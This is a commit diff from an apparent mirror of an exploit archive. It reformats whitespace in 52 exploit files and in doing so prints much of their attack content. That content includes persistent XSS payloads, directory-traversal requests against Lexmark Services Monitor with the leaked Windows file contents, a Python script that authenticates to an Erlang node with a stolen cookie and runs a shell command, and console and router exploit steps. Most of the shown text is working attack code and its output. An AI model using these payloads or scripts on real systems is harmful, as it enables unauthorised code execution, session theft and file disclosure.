bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-09-03

Browse source 
52 changes to exploits/shellcodes
This commit is contained in:
Offensive Security 2021-09-03 21:04:54 +00:00
parent b4c96a5864
commit c9a65a1f7b
52 changed files with 266 additions and 266 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
exploits/aix/dos/34588.txt
View file

@ -1,9 +1,9 @@
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM

4
exploits/android/dos/39629.txt
View file

@ -4,8 +4,8 @@ The wireless driver for the Android One (sprout) devices has a bad copy_from_use
This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET.
See
hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.
See
hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.
[ 56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: G W 3.10.57-g9e1c396 #1
[ 56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000

2
exploits/cgi/webapps/34103.txt
View file

@ -147,7 +147,7 @@ primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM
PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
<td style="vertical-align:middle;text-align:left;white-space:nowrap">
%20"><iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
%20"><iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
"="[PERSISTENT INJECTED SCRIPT CODE!]< </iframe><input name="user_domain_admin:1"
id="user_domain_admin:1" value=""[PERSISTENT INJECTED SCRIPT CODE!]" type="hidden"></td>

14
exploits/hardware/local/44820.txt
View file

@ -10,14 +10,14 @@ Due to the lack of proper checks after exiting the ROP chain, it is possible in
## PLEASE READ FIRST:
- For best results with the flash dumper, here are the recommended steps.
- Open the browser & browse to the ps3xploit.com website, go to the page of the exploit you need. Set the current page as browser homepage. Don't launch the exploit initialization. Close the browser.
- Open the browser. The exploit page will load automatically. Choose your dump path option or download the dump.jpg file if you use the hdd edition.
- Open the browser & browse to the ps3xploit.com website, go to the page of the exploit you need. Set the current page as browser homepage. Don't launch the exploit initialization. Close the browser.
- Open the browser. The exploit page will load automatically. Choose your dump path option or download the dump.jpg file if you use the hdd edition.
- Press the exploit initialization button & wait until initialization succeeds. If it fails, follow the refresh/reload instructions on screen.
- Trigger the exploit.
- On success, check your dump with the py checker tool.
- Trigger the exploit.
- On success, check your dump with the py checker tool.
## Usage Tips:
- Try using a LAN connection or a solid WiFi connection during exploitation. A weak signal can cause problems.
- If the exploit takes more than 5 minutes to work, reload page, browser, or restart console and try again.
- If you are using a LAN connection and experience network issues, make sure all cables to router are in working order.
- Try using a LAN connection or a solid WiFi connection during exploitation. A weak signal can cause problems.
- If the exploit takes more than 5 minutes to work, reload page, browser, or restart console and try again.
- If you are using a LAN connection and experience network issues, make sure all cables to router are in working order.

4
exploits/hardware/webapps/21395.txt
View file

@ -140,7 +140,7 @@ align=``left``><input name=``ip6`` size=``50`` maxlength=``43`` value=``::/0`` o
<tr class=``object_tag_row``>
<td colspan=``2``>Tags</td></tr>
<tr class=``object_tag_row``>
<td class=``dep_opt``><label for=``appliedTags``>Applied tags</label></td>
<td class=``dep_opt``><label for=``appliedTags``>Applied tags</label></td>
<td><span class=``tag_list`` id=``appliedTags``><span class=``object_tag object_tag_remove``
mkey=````><[PERSISTENT INJECTED SCRIPT CODE!]'<``=````><span class=``tag_label``>
@ -162,7 +162,7 @@ type=``hidden``>
<div class=``footer``><input class=``button`` value=``Return``
onclick=``if (window.opener) {window.close(); } else if (parent && parent.wij_in_modal_op && parent.wij_in_modal_op())
{ parent.wij_end_modal_dialog(); } else {document.location='/success'}`` type=``button``>
</div></form>
</div></form>
... or

2
exploits/hardware/webapps/31765.txt
View file

@ -139,7 +139,7 @@ primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM
PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
<td style="vertical-align:middle;text-align:left;white-space:nowrap">
%20"><iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
%20"><iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
"="[PERSISTENT INJECTED SCRIPT CODE!]< </iframe><input name="user_domain_admin:1"
id="user_domain_admin:1" value=""[PERSISTENT INJECTED SCRIPT CODE!]" type="hidden"></td>

8
exploits/hardware/webapps/31790.txt
View file

@ -150,7 +150,7 @@ PoC: Create User Object > Create User Expression - Listing
<tr class="config_module_tr" id="config_module_row_4">
<td valign="top" width="15"> </td>
<td valign="top" width="100">Group Match</td>
<td valign="top" width="100">Group Match</td>
<td valign="top" width="400"><table class="config_module IT" frame="box" id="group_match_table" rules="none" summary="Box"
cellpadding="0" cellspacing="0"><tbody><tr bgcolor="#cccccc"><td style="text-align:center;"><b>Pattern</b></td>
@ -158,7 +158,7 @@ cellpadding="0" cellspacing="0"><tbody><tr bgcolor="#cccccc"><td style="text-ali
id="group_match_pattern" name="group_match_pattern" size="30" type="text"></td><td width="20"><input class="new_button"
id="+" name="+" onclick="add_group_match_pattern()" value="+" type="button"></td></tr>
<tr class="pattern"><td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td><input class="new_button" value="-"
name="0" type="button"></td></tr></tbody></table><input id="pattern_group_match:yes" name="pattern_group_match" value="yes" type="checkbox">
name="0" type="button"></td></tr></tbody></table><input id="pattern_group_match:yes" name="pattern_group_match" value="yes" type="checkbox">
<label for="pattern_group_match:yes" style="display:inline">All Group Patterns must match</label></td>
<td valign="top" width="120"><div id="helpbox"><b class="outlinetop">
@ -175,10 +175,10 @@ If the check box is cleared, only one list item may match. <b>Default</b>: Off</
... && Add
<tbody><tr bgcolor="#cccccc"><td style="text-align:center;" width="100"><b>Name</b></td><td style="text-align:center;"
<tbody><tr bgcolor="#cccccc"><td style="text-align:center;" width="100"><b>Name</b></td><td style="text-align:center;"
width="100"><b>Group Match</b></td><td style="text-align:center;" width="50"><b></b></td></tr>
<tr class="pattern">
<td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]">
<td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]">
</iframe></td><td><img style="cursor:pointer;" name="0" src="/images/edit.png"><input name="0" src="/images/del.png" type="image"></td></tr></tbody>

2
exploits/hardware/webapps/33129.html
View file

@ -1,4 +1,4 @@
<!--
<!--
# Exploit Title: Beetel 450TC2 Router Admin Password Cross Site Request
Forgery Vulnerability
# Date: 30/04/2014

2
exploits/hardware/webapps/44933.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-06-23
# Exploit Author: Navina Asrani
# Version: N-150

2
exploits/hardware/webapps/44939.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: Intex Router N-150 - Arbitrary File Upload
# Exploit Title: Intex Router N-150 - Arbitrary File Upload
# Date: 2018-06-23
# Exploit Author: Samrat Das
# Version: N-150

278
exploits/hardware/webapps/47663.txt
View file

@ -1,142 +1,142 @@
# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A
# Date: 2019-11-15
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.lexmark.com/en_us.html
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# Google Dork: N/A
# Date: 2019-11-15
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.lexmark.com/en_us.html
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# CVE : CVE-2019-16758
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.
Timeline:
Discovered on: 9/24/2019
Vendor Notified: 9/24/2019
Vendor Confirmed Receipt of Vulnerability: 9/24/2019
Follow up with Vendor: 9/25/2019
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
Vendor Confirmed Vulnerability is Valid: 9/26/2019
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019
Vendor Confirmed Signoff to Disclose: 9/27/2019
Final Email Sent: 9/27/2019
Public Disclosure: 11/15/2019
PoC:
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 848536
.
.
.
.[.P.e.r.f.l.i.b.].
.
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.
.
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.
.
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.
.
.L.a.s.t. .H.e.l.p.=.5.0.4.1.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 38710
..[.S.t.r.i.n.g.s.].
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 17463
# Copyright (c) 1993-2004 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name> <port number>/<protocol> [aliases...] [#<comment>]
#
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/udp users #Active users
daytime 13/tcp
daytime 13/udp
qotd 17/tcp quote #Quote of the day
qotd 17/udp quote #Quote of the day
chargen 19/tcp ttytst source #Character generator
chargen 19/udp ttytst source #Character generator
ftp-data 20/tcp #FTP, data
ftp 21/tcp #FTP. control
ssh 22/tcp #SSH Remote Login Protocol
telnet 23/tcp
smtp 25/tcp mail #Simple Mail Transfer Protocol
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.
Timeline:
Discovered on: 9/24/2019
Vendor Notified: 9/24/2019
Vendor Confirmed Receipt of Vulnerability: 9/24/2019
Follow up with Vendor: 9/25/2019
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
Vendor Confirmed Vulnerability is Valid: 9/26/2019
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019
Vendor Confirmed Signoff to Disclose: 9/27/2019
Final Email Sent: 9/27/2019
Public Disclosure: 11/15/2019
PoC:
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 848536
.
.
.
.[.P.e.r.f.l.i.b.].
.
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.
.
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.
.
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.
.
.L.a.s.t. .H.e.l.p.=.5.0.4.1.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 38710
..[.S.t.r.i.n.g.s.].
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 17463
# Copyright (c) 1993-2004 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name> <port number>/<protocol> [aliases...] [#<comment>]
#
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/udp users #Active users
daytime 13/tcp
daytime 13/udp
qotd 17/tcp quote #Quote of the day
qotd 17/udp quote #Quote of the day
chargen 19/tcp ttytst source #Character generator
chargen 19/udp ttytst source #Character generator
ftp-data 20/tcp #FTP, data
ftp 21/tcp #FTP. control
ssh 22/tcp #SSH Remote Login Protocol
telnet 23/tcp
smtp 25/tcp mail #Simple Mail Transfer Protocol
time 37/tcp timserver

8
exploits/ios/webapps/31733.txt
View file

@ -141,7 +141,7 @@ application user account. For security demonstration or to reproduce the vulnera
PoC: File Dir Index Listing - filename
<div id="module_main"><h2>Wi-Fi File Transfer</h2>
<div id="module_main"><h2>Wi-Fi File Transfer</h2>
<hr><div class="files"><bq>Files</bq>
<p><a href="..">..</a><br> </p><a href="TESTER23.jpg">TESTER23</a>
( 23.8 Kb, 2014-02-15 13:45:00 +0000)<br>
@ -149,7 +149,7 @@ PoC: File Dir Index Listing - filename
( 23.8 Kb, 2014-02-15 13:45:46 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
<label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form>
<hr></div></div></div></center></body></html></iframe></a></div></div>
<hr></div></div></div></center></body></html></iframe></a></div></div>
PoC URL: http://localhost:50496/Box/[LOCAL FILE!]
@ -178,7 +178,7 @@ application user account. For security demonstration or to reproduce the vulnera
PoC: File Dir Index Listing - filename (multiple extensions)
<div id="module_main"><h2>Wi-Fi File Transfer</h2>
<div id="module_main"><h2>Wi-Fi File Transfer</h2>
<hr><div class="files"><bq>Files</bq>
<p><a href="..">..</a><br> </p><a href="TESTER23.jpg">TESTER23</a>
( 23.8 Kb, 2014-02-15 13:45:00 +0000)<br>
@ -186,7 +186,7 @@ PoC: File Dir Index Listing - filename (multiple extensions)
( 23.8 Kb, 2014-02-15 13:45:46 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
<label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form>
<hr></div></div></div></center></body></html></iframe></a></div></div>
<hr></div></div></div></center></body></html></iframe></a></div></div>
PoC URL: http://localhost:50496/Box/%20image[ARBITRARY FILE UPLOAD VULNERABILITY!].jpg.gif.js.php

4
exploits/ios/webapps/34626.txt
View file

@ -109,7 +109,7 @@ PoC: Web Interface - Index Dir Listing
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>WiFi web access</title>
</head><body><fontbase family="Arial,Verdana">
</head><body><fontbase family="Arial,Verdana">
<style type="text/css">
a, div{
font-family: Arial,Verdana;
@ -376,7 +376,7 @@ PoC: Web Interface - Index Dir Listing
<div style="height: 30px; width: 120px; left: 15px;" class="uploadify" id="file-upload"><object style="position: absolute; z-index: 1;" id="SWFUpload_0" type="application/x-shockwave-flash" data="/Web/uploadify/uploadify.swf" class="swfupload" height="30" width="120"><param name="wmode" value="transparent"><param name="movie" value="/Web/uploadify/uploadify.swf"><param name="quality" value="high"><param name="menu" value="false"><param name="allowScriptAccess" value="always"><param name="flashvars" value="movieName=SWFUpload_0&uploadURL=%2Fupload.html&useQueryString=false&requeueOnError=false&httpSuccess=&assumeSuccessTimeout=30<33>ms=&filePostName=Filedata&fileTypes=*.*&fileTypesDescription=All%20Files&fileSizeLimit=0&fileUploadLimit=0&fileQueueLimit=999&debugEnabled=false&buttonImageURL=%2F&buttonWidth=120&buttonHeight=30&buttonText=&buttonTextTopPadding=0&buttonTextLeftPadding=0&buttonTextStyle=color%3A%20%23000000%3B%20font-size%3A%2016pt%3B&buttonAction=-110&buttonDisabled=false&buttonCursor=-2"></object><div style="height: 30px; line-height: 30px; width: 120px;" class="uploadify-button " id="file-upload-button"><span class="uploadify-button-text"><3E>berliefern</span></div></div><div class="uploadify-queue" id="file-upload-queue"></div>
<hr>
<a href="#" name="/2.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/2_43698027.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2_43698027.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT" class="document" onclick="aClickHandler(this);" style="position:relative; text-decoration:none;"><img class="aImg" style="" src="/Web/TXT0.png" height="60px" width="60px"><div class="name" style="position:absolute; top:1px !important; top:65px; height:17px; left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:18px;z-index:2000;">>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT</div></a><br/><br/><br/>
<a href="#" name="/2.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/2_43698027.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2_43698027.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT" class="document" onclick="aClickHandler(this);" style="position:relative; text-decoration:none;"><img class="aImg" style="" src="/Web/TXT0.png" height="60px" width="60px"><div class="name" style="position:absolute; top:1px !important; top:65px; height:17px; left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:18px;z-index:2000;">>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT</div></a><br/><br/><br/>
</div>
<div id="wrap" style="background-color:black; top:0; left:0; width:100%; height:100%; position:absolute; z-index:1000; display:none;">

4
exploits/ios/webapps/35083.txt
View file

@ -102,13 +102,13 @@ low or medium user interaction. For security demonstration or to reproduce the i
PoC: Folder Plus > THE VERY GAMES - Wifi UI Index
<tbody><tr style="height:32px"><td style="width:32px"></td><td></td><td style="width:32px"></td></tr>
<tbody><tr style="height:32px"><td style="width:32px"></td><td></td><td style="width:32px"></td></tr>
<tr style="height:66px" valign="top">
<td></td>
<td id="modal_body1" style="width:336px" align="left">Delete<div style="display: inline-block;"
class="horz_padding"></div><img src="/?action=extra&path=icons/iconFolder.png" style="width: 16px; height:
16px; vertical-align: text-top;"><div style="width: 4px;
display: inline-block;"></div> "><[PERSISTENT INJECTED SCRIPT CODE!]);"><div style="display: inline-block;" class="horz_padding"></div>?</td>
display: inline-block;"></div> "><[PERSISTENT INJECTED SCRIPT CODE!]);"><div style="display: inline-block;" class="horz_padding"></div>?</td>
<td></td>
</tr>
<tr style="height:32px" valign="middle">

2
exploits/linux/webapps/38833.txt
View file

@ -16,5 +16,5 @@ example:
for passwd
(issue fixed in 2012, reintroduced in february 2015. Fixed again november
(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)

2
exploits/linux/webapps/45090.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
# Date: 2018-07-22
# Exploit Author: Zaran Shaikh
# Version: 2.5.12

22
exploits/multiple/remote/49418.py
View file

@ -13,53 +13,53 @@
# this cookie is commonly called ".erlang.cookie"
#
#!/usr/local/bin/python3
import socket
from hashlib import md5
import struct
import sys
TARGET = "192.168.1.1"
PORT = 25672
COOKIE = "XXXXXXXXXXXXXXXXXXXX"
CMD = "whoami"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
name_msg = b"\x00"
name_msg += b"\x15"
name_msg += b"n"
name_msg += b"\x00\x07"
name_msg += b"\x00\x03\x49\x9c"
name_msg += b"AAAAAA@AAAAAAA"
s.send(name_msg)
s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]
print("Extracted challenge: {}".format(challenge))
challenge_reply = b"\x00\x15"
challenge_reply += b"r"
challenge_reply += b"\x01\x02\x03\x04"
challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()
s.send(challenge_reply)
challenge_res = s.recv(1024)
if len(challenge_res) == 0:
print("Authentication failed, exiting")
sys.exit(1)
print("Authentication successful")
ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
msg += struct.pack(">H", len(CMD))
msg += bytes(CMD, 'ascii')
msg += b'jw\x04user'
payload = b'\x70' + ctrl + msg
payload = struct.pack('!I', len(payload)) + payload
print("Sending cmd: '{}'".format(CMD))

6
exploits/multiple/webapps/43177.txt
View file

@ -37,7 +37,7 @@ Vulnerable sections:
Notes
Inbox
Inbox
Attack Narratives and Scenarios:
@ -79,7 +79,7 @@ Cookie: Mycookie
Connection: close
sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
sf=true&output=js&action=CREATE&useproto=true&add=boumediene.k%40victim.dz%2Csnbemail%40gmail.com&crm=BUSY&icc=DEFAULT&sprop=goo.allowModify%3Afalse&sprop=goo.allowInvitesOther%3Atrue&sprop=goo.showInvitees%3Atrue&pprop=eventColor%3Anone&eid=762dgnlok9l44rd63im4kisjnd&eref=762dgnlok9l33rd55im4kisjnd&cts=1511425384353&text=%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E&location=Stored%20XSS&details=Stored%20XSS&src=snbemail%40gmail.com&dates=20171123T093000%2F20171123T103000&unbounded=false&gdoc-attachment&scfdata=W1tdXQ..&stz&etz&scp=ONE&nopts=2&nopts=3&nopts=4&hl=en_GB&secid=6VLs1BGsgBB_Tqz6egnXpCYYF24
Once the victim receives the invitation, he/she will not be obliged to click on any link or download any file. The only condition for this PoC to work is a single click to read the email. Once the victim reads the email, the code gets executed on the victim's browser ending up sending sensitive data to the adversary.
@ -146,7 +146,7 @@ In order to leverage this vulnerability, a victim must first acquire a local mai
The victim reads the email using Crystal webmail and the code gets executed.
Remediation:
Remediation:
Sanitize, escape and validate user supplied data accordingly

2
exploits/multiple/webapps/44360.txt
View file

@ -58,7 +58,7 @@ value="test" />
</html>
3] POCs and steps:
3] POCs and steps:
